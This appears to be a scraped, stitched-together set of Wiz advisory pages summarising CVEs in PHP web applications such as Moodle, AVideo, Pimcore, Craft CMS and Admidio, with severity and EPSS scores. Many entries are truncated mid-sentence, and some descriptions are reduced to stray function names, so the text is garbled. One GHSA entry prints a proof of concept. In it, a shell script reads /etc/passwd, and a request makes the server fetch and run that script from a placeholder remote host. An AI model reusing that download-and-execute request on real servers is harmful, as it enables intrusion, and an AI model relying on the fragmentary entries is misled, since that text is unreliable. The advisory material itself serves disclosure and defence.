PHP vulnerability analysis and mitigation
Nextmatch
WHERE
is_int()
Source : NVD
## 8.7
Score
Published January 28, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
egroupware/egroupware
Sources
NVD
Composer Severity HIGH Has Fix Added at: Jan 29, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h
Wiz
CVE-2025-14177 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2025-14177 [MEDIUM] CVE-2025-14177 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14177 :
PHP vulnerability analysis and mitigation
In PHP versions:8.1.* before 8.1.34, 8.2.* before 8.2.30, 8.3.* before 8.3.29, 8.4.* before 8.4.16, 8.5.* before 8.5.1, the getimagesize() function may leak uninitialized heap memory into the APPn segments (e.g., APP1) when reading images in multi-chunk mode (such as via php://filter). This occurs due to a bug in php_read_stream_all_chunks() that overwrites the buffer without advancing the pointer, leaving tail bytes uninitialized. This may lead to information disclosure of sensitive heap data and affect the confidentiality of the target server.
Source : NVD
## 6.3
Score
Published December 27, 2025
Severity MEDIUM
CNA Score 6.3
Affected Technologies
PHP
Rocky Linux
Has Public Exploit Yes
Has CISA KEV Exploit No
C
Wiz
CVE-2026-28507 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-28507 [HIGH] CVE-2026-28507 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28507 :
PHP vulnerability analysis and mitigation
Idno is a social publishing platform. Prior to version 1.6.4, there is a remote code execution vulnerability via chained import file write and template path traversal. This issue has been patched in version 1.6.4.
Source : NVD
## 8.6
Score
Published March 6, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 63.8
Exploitation Probability (EPSS) 0.5
Affected packages and libraries
idno/known
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's expl
Wiz
CVE-2026-0895 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.2
CVE-2026-0895 [MEDIUM] CVE-2026-0895 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0895 :
PHP vulnerability analysis and mitigation
The extension extends TYPO3’ FileSpool component, which was vulnerable to Insecure Deserialization prior to TYPO3-CORE-SA-2026-004 https://typo3.org/security/advisory/typo3-core-sa-2026-004 . Since the related fix is overwritten by the extension, using the extension with a patched TYPO3 core version still allows for Insecure Deserialization, because the affected vulnerable code was extracted from TYPO3 core to the extension. More information about this vulnerability can be found in the related TYPO3 Core Security Advisory TYPO3-CORE-SA-2026-004 https://typo3.org/security/advisory/typo3-core-sa-2026-004 .
Source : NVD
## 5.2
Score
Published January 20, 2026
Severity MEDIUM
CNA Score 5.2
Affected Technologies
PHP
Has P
Wiz
CVE-2026-34728 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-34728 [HIGH] CVE-2026-34728 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34728 :
PHP vulnerability analysis and mitigation
phpMyFAQ is an open source FAQ web application. Prior to version 4.1.1, the MediaBrowserController::index() method handles file deletion for the media browser. When the fileRemove action is triggered, the user-supplied name parameter is concatenated with the base upload directory path without any path traversal validation. The FILTER_SANITIZE_SPECIAL_CHARS filter only encodes HTML special characters (&, ', ", ) and characters with ASCII value < 32, and does not prevent directory traversal sequences like ../. Additionally, the endpoint does not validate CSRF tokens, making it exploitable via CSRF attacks. This issue has been patched in version 4.1.1.
Source : NVD
## 8.7
Score
Published April 2, 2026
Severity HIGH
CNA Sc
Wiz
CVE-2025-67855 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2025-67855 [MEDIUM] CVE-2025-67855 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67855 :
PHP vulnerability analysis and mitigation
A flaw was found in mooodle. A remote attacker could exploit a reflected Cross-Site Scripting (XSS) vulnerability in the policy tool return URL. This vulnerability arises from insufficient sanitization of URL parameters, allowing attackers to inject malicious scripts through specially crafted links. Successful exploitation could lead to information disclosure or arbitrary client-side script execution within the user's browser.
Source : NVD
## 6.1
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.3
Exploitation Probability (EPSS)
Wiz
CVE-2026-21448 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9
CVE-2026-21448 [HIGH] CVE-2026-21448 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21448 :
PHP vulnerability analysis and mitigation
add address
Source : NVD
## 8.9
Score
Published January 2, 2026
Severity HIGH
CNA Score 8.9
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 36.8
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
bagisto/bagisto
Sources
NVD
Composer Severity HIGH Has Fix Added at: Jan 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-3m53-887h
HIGH
7
Wiz
GHSA-5q8v-j673-m5v4 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-5q8v-j673-m5v4 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-5q8v-j673-m5v4 :
PHP vulnerability analysis and mitigation
## Summary
GET /api/v1/users
GET /api/v1/users/{id}
## Affected Endpoints
GET /api/v1/users (UserController::index, line 94) — Lists ALL users with full details. No role check.
GET /api/v1/users/{id} (UserController::show, line 126) — Shows any user's details by ID. No role check.
## Root Cause (1-of-N Inconsistency)
Other methods in the same controller properly check for the 'owner' role:
store()
UserStoreRequest::authorize()
auth()->user()->hasRole('owner')
destroy()
$this->repository->hasRole($admin, 'owner')
index()
show()
routes/api.php:734-747
auth:api
## Exposed Data
UserTransformer
email
role
blocked
blocked_code
created_at
updated_at
## Impact
Any authenticated user can:
Enumer
Wiz
CVE-2026-29173 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.9
CVE-2026-29173 [LOW] CVE-2026-29173 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29173 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. Prior to 4.10.2 and 5.5.3, a stored XSS vulnerability exists when a user tries to update the Order Status from the Commerce Orders Table. The Order Status Name is rendered without proper escaping, allowing script execution to occur. This vulnerability is fixed in 4.10.2 and 5.5.3.
Source : NVD
## 1.9
Score
Published March 10, 2026
Severity LOW
CNA Score 1.9
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
craftcms/commerce
Sources
NVD
Composer Severity LOW Has Fix Adde
Wiz
CVE-2025-66843 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2025-66843 [MEDIUM] CVE-2025-66843 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66843 :
PHP vulnerability analysis and mitigation
grav before v1.7.49.5 has a Stored Cross-Site Scripting (Stored XSS) vulnerability in the page editing functionality. An authenticated low-privileged user with permission to edit content can inject malicious JavaScript payloads into editable fields. The payload is stored on the server and later executed when any other user views or edits the affected page.
Source : NVD
## 5.4
Score
Published December 15, 2025
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
getgrav/grav
Sources
NVD
Composer S
Wiz
CVE-2026-27461 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-27461 [MEDIUM] CVE-2026-27461 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27461 :
PHP vulnerability analysis and mitigation
Pimcore is an Open Source Data & Experience Management Platform. In versions up to and including 11.5.14.1 and 12.3.2, the filter query parameter in the dependency listing endpoints is JSON-decoded and the value field is concatenated directly into RLIKE clauses without sanitization or parameterized queries. Exploiting this issue requires admin authentication. An attacker with admin panel access can extract the full database including password hashes of other admin users. Version 12.3.3 contains a patch.
Source : NVD
## 6.9
Score
Published February 24, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploit
Wiz
CVE-2026-27012 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-27012 [CRITICAL] CVE-2026-27012 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27012 :
PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, a privilege escalation and authentication bypass vulnerability in OpenSTAManager allows any attacker to arbitrarily change a user's group (idgruppo) by directly calling modules/utenti/actions.php. This can promote an existing account (e.g. agent) into the Amministratori group as well as demote any user including existing administrators.
Source : NVD
## 9.8
Score
Published March 3, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.1
Exploitation Pro
Wiz
CVE-2026-33319 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.9
CVE-2026-33319 [MEDIUM] CVE-2026-33319 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33319 :
PHP vulnerability analysis and mitigation
uploadVideoToLinkedIn()
escapeshellarg()
Source : NVD
## 7.5
Score
Published March 22, 2026
Severity HIGH
CNA Score 5.9
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHS
Wiz
CVE-2018-25157 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2018-25157 [MEDIUM] CVE-2018-25157 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2018-25157 :
PHP vulnerability analysis and mitigation
Phraseanet 4.0.3 contains a stored cross-site scripting vulnerability that allows authenticated users to inject malicious scripts through crafted file names during document uploads. Attackers can upload files with embedded SVG scripts that execute in the browser, potentially stealing cookies or redirecting users when the file is viewed.
Source : NVD
## 5.1
Score
Published February 11, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
phraseanet/phraseanet
Sources
NVD
Composer Severity MEDIUM
Wiz
CVE-2026-4202 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4202 [MEDIUM] CVE-2026-4202 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4202 :
PHP vulnerability analysis and mitigation
The extension fails to verify, if an authenticated user has permissions to access to redirects resulting in exposure of redirect records when editing a page.
Source : NVD
## 2.3
Score
Published March 17, 2026
Severity LOW
CNA Score 2.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
ayacoo/redirect-tab
Sources
NVD
Composer Severity LOW Has Fix Added at: Mar 19, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP
Wiz
CVE-2026-32756 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-32756 [HIGH] CVE-2026-32756 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32756 :
PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. Versions 5.0.6 and below contain a critical unrestricted file upload vulnerability in the Documents & Files module. Due to a design flaw in how CSRF token validation and file extension verification interact within UploadHandlerFile.php, an authenticated user with upload permissions can bypass file extension restrictions by intentionally submitting an invalid CSRF token. This allows the upload of arbitrary file types, including PHP scripts, which may lead to Remote Code Execution on the server, resulting in full server compromise, data exfiltration, and lateral movement. This issue has been fixed in version 5.0.7.
Source : NVD
## 8.8
Score
Published March 20, 2026
Sever
Wiz
CVE-2026-27198 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-27198 [HIGH] CVE-2026-27198 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27198 :
PHP vulnerability analysis and mitigation
Formwork is a flat file-based Content Management System (CMS). In versions 2.0.0 through 2.3.3, the application fails to properly enforce role-based authorization during account creation. Although the system validates that the specified role exists, it does not verify whether the current user has sufficient privileges to assign highly privileged roles such as admin. As a result, an authenticated user with the editor role can create a new account with administrative privileges, leading to full administrative access and complete compromise of the CMS. This issue has been fixed in version 2.3.4.
Source : NVD
## 8.8
Score
Published February 21, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploi
Wiz
CVE-2026-33492 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.3
CVE-2026-33492 [HIGH] CVE-2026-33492 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33492 :
PHP vulnerability analysis and mitigation
_session_start()
PHPSESSID
User::login()
Source : NVD
## 7.3
Score
Published March 23, 2026
Severity HIGH
CNA Score 7.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 21, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHS
Wiz
CVE-2026-31819 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-31819 [MEDIUM] CVE-2026-31819 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31819 :
PHP vulnerability analysis and mitigation
Sylius is an Open Source eCommerce Framework on Symfony. CurrencySwitchController::switchAction(), ImpersonateUserController::impersonateAction() and StorageBasedLocaleSwitcher::handle() use the HTTP Referer header directly when redirecting. The attack requires the victim to click a legitimate application link placed on an attacker-controlled page. The browser automatically sends the attacker's site as the Referer, and the application redirects back to it. This can be used for phishing or credential theft, as the redirect originates from a trusted domain. The severity varies by endpoint; public endpoints require no authentication and are trivially exploitable, while admin-only endpoints require an authenticated session but rem
Wiz
CVE-2026-30878 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-30878 [MEDIUM] CVE-2026-30878 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30878 :
PHP vulnerability analysis and mitigation
baserCMS is a website development framework. Prior to version 5.2.3, a public mail submission API allows unauthenticated users to submit mail form entries even when the corresponding form is not accepting submissions. This bypasses administrative controls intended to stop form intake and enables spam or abuse via the API. This issue has been patched in version 5.2.3.
Source : NVD
## 5.3
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12
Exploitation Probability (EPSS) N/A
Affected packages and libraries
baserproject/basercms
Sources
Wiz
CVE-2026-35541 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35541 [MEDIUM] CVE-2026-35541 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35541 :
PHP vulnerability analysis and mitigation
An issue was discovered in Roundcube Webmail before 1.5.14 and 1.6.14. Incorrect password comparison in the password plugin could lead to type confusion that allows a password change without knowing the old password.
Source : NVD
## 4.2
Score
Published April 3, 2026
Severity MEDIUM
CNA Score 4.2
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10
Exploitation Probability (EPSS) N/A
Affected packages and libraries
roundcube/roundcubemail
roundcube
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Apr 05, 2026
Echo Severity MEDIUM Has Fix Added at: Apr 05, 2026
Wiz
CVE-2026-25522 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-25522 [MEDIUM] CVE-2026-25522 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25522 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator’s browser. This occurs because the Shipping Zone (Name & Description) fields in the Store Management section are not properly sanitized before being displayed in the admin panel. This issue has been patched in versions 4.10.1 and 5.5.2.
Source : NVD
## 6.1
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.5
E
Wiz
CVE-2026-27593 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-27593 [CRITICAL] CVE-2026-27593 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27593 :
PHP vulnerability analysis and mitigation
Statmatic is a Laravel and Git powered content management system (CMS). Prior to versions 6.3.3 and 5.73.10, an attacker may leverage a vulnerability in the password reset feature to capture a user's token and reset the password on their behalf. The attacker must know the email address of a valid account on the site, and the actual user must blindly click the link in their email even though they didn't request the reset. This has been fixed in 6.3.3 and 5.73.10.
Source : NVD
## 8.8
Score
Published February 24, 2026
Severity HIGH
CNA Score 9.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.9
Expl
Wiz
CVE-2026-1196 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.3
CVE-2026-1196 [LOW] CVE-2026-1196 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1196 :
PHP vulnerability analysis and mitigation
A security vulnerability has been detected in MineAdmin 1.x/2.x. Affected is an unknown function of the file /system/getFileInfoById. Such manipulation of the argument ID leads to information disclosure. It is possible to launch the attack remotely. The attack requires a high level of complexity. The exploitability is told to be difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 2.3
Score
Published January 20, 2026
Severity LOW
CNA Score 2.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (
Wiz
CVE-2026-23492 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-23492 [HIGH] CVE-2026-23492 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23492 :
PHP vulnerability analysis and mitigation
Pimcore is an Open Source Data & Experience Management Platform. Prior to 12.3.1 and 11.5.14, an incomplete SQL injection patch in the Admin Search Find API allows an authenticated attacker to perform blind SQL injection. Although CVE-2023-30848 attempted to mitigate SQL injection by removing SQL comments (--) and catching syntax errors, the fix is insufficient. Attackers can still inject SQL payloads that do not rely on comments and infer database information via blind techniques. This vulnerability affects the admin interface and can lead to database information disclosure. This vulnerability is fixed in 12.3.1 and 11.5.14.
Source : NVD
## 4.9
Score
Published January 14, 2026
Severity MEDIUM
CNA Score 8.8
Affected T
Wiz
CVE-2026-32757 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-32757 [MEDIUM] CVE-2026-32757 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32757 :
PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. In versions 5.0.6 and below, the eCard send handler uses a raw $_POST['ecard_message'] value instead of the HTMLPurifier-sanitized $formValues['ecard_message'] when constructing the greeting card HTML. This allows an authenticated attacker to inject arbitrary HTML and JavaScript into greeting card emails sent to other members, bypassing the server-side HTMLPurifier sanitization that is properly applied to the ecard_message field during form validation. An attack can result in any member or role receiving phishing content that appears legitimate, crossing from the web application into recipients' email clients. This issue has been fixed in version 5.0.7.
Source : NVD
## 5.4
Wiz
CVE-2026-34733 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-34733 [MEDIUM] CVE-2026-34733 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34733 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo installation script install/deleteSystemdPrivate.php contains a PHP operator precedence bug in its CLI-only access guard. The script is intended to run exclusively from the command line, but the guard condition !php_sapi_name() === 'cli' never evaluates to true due to how PHP resolves operator precedence. The ! (logical NOT) operator binds more tightly than === (strict comparison), causing the expression to always evaluate to false, which means the die() statement never executes. As a result, the script is accessible via HTTP without authentication and will delete files from the server's temp directory while also disclosing the temp directory
Wiz
GHSA-pr3g-phhr-h8fh Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-pr3g-phhr-h8fh Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-pr3g-phhr-h8fh :
PHP vulnerability analysis and mitigation
## Summary
A vulnerability has been identified that allows an authenticated administrator to execute arbitrary code on the host server. By modifying the binary path settings for built-in network tools and bypassing an input filter, an attacker with administrative privileges can download and execute malicious payloads.
## Details
/settings/external/binaries
GET /ajax/netcmd
## PoC
malicious.sh
#!/usr/bin/env bash
cat /etc/passwd
cat /etc/group
whoami
pwd
ls
Host a remote HTTP server that the server can reach and place the malicious script on the remote server. For demonstration, I will start it on localhost.
malicious.sh
GET /ajax/netcmd?cmd=whois&query={remote http server's ip address}/malicious.sh
## Imp
Wiz
CVE-2025-67851 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-67851 [MEDIUM] CVE-2025-67851 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67851 :
PHP vulnerability analysis and mitigation
A flaw was found in moodle. This formula injection vulnerability occurs when data fields are exported without proper escaping. A remote attacker could exploit this by providing malicious data that, when exported and opened in a spreadsheet, allows arbitrary formulas to execute. This can lead to compromised data integrity and unintended operations within the spreadsheet.
Source : NVD
## 7.8
Score
Published February 3, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15
Exploitation Probability (EPSS) N/A
Affected packages and libraries
moodle/moodle
moodle
Wiz
CVE-2026-33513 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-33513 [HIGH] CVE-2026-33513 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33513 :
PHP vulnerability analysis and mitigation
APIName=locale
include
view/about.php
Source : NVD
## 7.5
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 38.7
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 21, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h
Wiz
CVE-2026-28781 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-28781 [HIGH] CVE-2026-28781 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28781 :
PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). Prior to 4.17.0-beta.1 and 5.9.0-beta.1, the entry creation process allows for Mass Assignment of the authorId attribute. A user with "Create Entries" permission can inject the authorIds[] (or authorId) parameter into the POST request, which the backend processes without verifying if the current user is authorized to assign authorship to others. Normally, this field is not present in the request for users without the necessary permissions. By manually adding this parameter, an attacker can attribute the new entry to any user, including Admins. This effectively "spoofs" the authorship. This vulnerability is fixed in 4.17.0-beta.1 and 5.9.0-beta.1.
Source : NVD
## 7.1
Score
Publi
Wiz
CVE-2025-67847 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2025-67847 [HIGH] CVE-2025-67847 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67847 :
PHP vulnerability analysis and mitigation
A flaw was found in Moodle. An attacker with access to the restore interface could trigger server-side execution of arbitrary code. This is due to insufficient validation of restore input, which leads to unintended interpretation by core restore routines. Successful exploitation could result in a full compromise of the Moodle application.
Source : NVD
## 8.8
Score
Published January 23, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
moodle
moodle/moodle
Sources
NVD
Composer Severit
Wiz
CVE-2026-33507 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-33507 [HIGH] CVE-2026-33507 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33507 :
PHP vulnerability analysis and mitigation
objects/pluginImport.json.php
session.cookie_samesite = 'None'
Source : NVD
## 8.8
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 18.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 21, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Wiz
CVE-2026-28508 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-28508 [CRITICAL] CVE-2026-28508 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28508 :
PHP vulnerability analysis and mitigation
Idno is a social publishing platform. Prior to version 1.6.4, a logic error in the API authentication flow causes the CSRF protection on the URL unfurl service endpoint to be trivially bypassed by any unauthenticated remote attacker. Combined with the absence of a login requirement on the endpoint itself, this allows an attacker to force the server to make arbitrary outbound HTTP requests to any host, including internal network addresses and cloud instance metadata services, and retrieve the response content. This issue has been patched in version 1.6.4.
Source : NVD
## 9.2
Score
Published March 6, 2026
Severity CRITICAL
CNA Score 9.2
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KE
Wiz
CVE-2026-23622 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-23622 [HIGH] CVE-2026-23622 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23622 :
PHP vulnerability analysis and mitigation
Easy!Appointments is a self hosted appointment scheduler. In 1.5.2 and earlier, application/core/EA_Security.php::csrf_verify() only enforces CSRF for POST requests and returns early for non-POST methods. Several application endpoints perform state-changing operations while accepting parameters from GET (or $_REQUEST), so an attacker can perform CSRF by forcing a victim's browser to issue a crafted GET request. Impact: creation of admin accounts, modification of admin email/password, and full admin account takeover.
Source : NVD
## 8.7
Score
Published January 15, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
